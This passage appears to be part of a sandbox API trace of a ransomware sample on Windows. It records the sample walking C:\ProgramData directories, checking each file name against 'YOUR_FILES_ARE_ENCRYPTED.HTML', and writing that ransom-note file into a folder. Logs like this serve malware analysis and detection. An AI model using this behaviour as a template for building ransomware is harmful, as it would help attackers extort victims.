nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0155.237] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents") returned 28 [0155.237] GetProcessHeap () returned 0x270000 [0155.237] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.237] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Documents" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents") returned="\\\\?\\C:\\ProgramData\\Documents" [0155.237] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents\\*") returned="\\\\?\\C:\\ProgramData\\Documents\\*" [0155.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.238] GetProcessHeap () returned 0x270000 [0155.238] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.238] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0155.238] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Favorites") returned 28 [0155.238] GetProcessHeap () returned 0x270000 [0155.238] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.238] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Favorites" | out: lpString1="\\\\?\\C:\\ProgramData\\Favorites") returned="\\\\?\\C:\\ProgramData\\Favorites" [0155.238] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Favorites\\*") returned="\\\\?\\C:\\ProgramData\\Favorites\\*" [0155.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.239] GetProcessHeap () returned 0x270000 [0155.239] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.239] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7c5a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7c5a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0155.239] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft") returned 28 [0155.239] GetProcessHeap () returned 0x270000 [0155.239] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.239] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Microsoft" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft") returned="\\\\?\\C:\\ProgramData\\Microsoft" [0155.240] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*" [0155.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7c5a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7c5a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.240] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7c5a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7c5a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.240] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0155.240] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance") returned 39 [0155.240] GetProcessHeap () returned 0x270000 [0155.240] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0155.242] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance" [0155.242] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*" [0155.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0155.242] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.242] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Client", cAlternateFileName="")) returned 1 [0155.242] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client") returned 46 [0155.242] GetProcessHeap () returned 0x270000 [0155.242] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7401060 [0155.244] lstrcpyW (in: lpString1=0x7401060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client" [0155.244] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*" [0155.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0155.244] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x85f7a2c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x85f7a2c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.244] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1.0", cAlternateFileName="")) returned 1 [0155.244] wnsprintfW (in: pszDest=0x7401060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0") returned 50 [0155.244] GetProcessHeap () returned 0x270000 [0155.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7412070 [0155.246] lstrcpyW (in: lpString1=0x7412070, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0" [0155.246] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*" [0155.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xd8429d0a, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0x963315a8, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.246] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0155.246] wnsprintfW (in: pszDest=0x7412070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 56 [0155.246] GetProcessHeap () returned 0x270000 [0155.246] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7423080 [0155.248] lstrcpyW (in: lpString1=0x7423080, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0155.249] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*" [0155.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0155.249] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.249] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x964fb1e0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xdb06b774, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xd56b6fd0, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0155.249] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 76 [0155.249] lstrcmpW (lpString1="Help_CValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.249] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0155.249] lstrlenW (lpString=".H1D") returned 4 [0155.249] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0155.249] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde50558e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde50558e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0155.249] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 78 [0155.249] lstrcmpW (lpString1="Help_MKWD_AssetId.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.249] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0155.249] lstrlenW (lpString=".H1W") returned 4 [0155.249] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0155.249] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde6f5420, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde6f5420, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0155.249] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0155.249] lstrcmpW (lpString1="Help_MKWD_BestBet.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.249] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0155.250] lstrlenW (lpString=".H1W") returned 4 [0155.250] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x79f16, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 75 [0155.250] lstrcmpW (lpString1="Help_MTOC_help.H1H", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0155.250] lstrlenW (lpString=".H1H") returned 4 [0155.250] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x98d10a72, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 76 [0155.250] lstrcmpW (lpString1="Help_MValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0155.250] lstrlenW (lpString=".H1D") returned 4 [0155.250] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0155.250] lstrcmpW (lpString1="Help_MValidator.Lck", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0155.250] lstrlenW (lpString=".Lck") returned 4 [0155.250] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x96bd5e0c, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xd53c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0155.250] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0155.250] lstrcmpW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.250] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0155.250] lstrlenW (lpString=".H1Q") returned 4 [0155.250] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0155.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x96bd5e0c, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xd53c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 0 [0155.250] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0155.251] wnsprintfW (in: pszDest=0x7423080, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0155.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.251] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0155.253] CloseHandle (hObject=0x594) returned 1 [0155.253] GetProcessHeap () returned 0x270000 [0155.254] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7423080 | out: hHeap=0x270000) returned 1 [0155.254] FindNextFileW 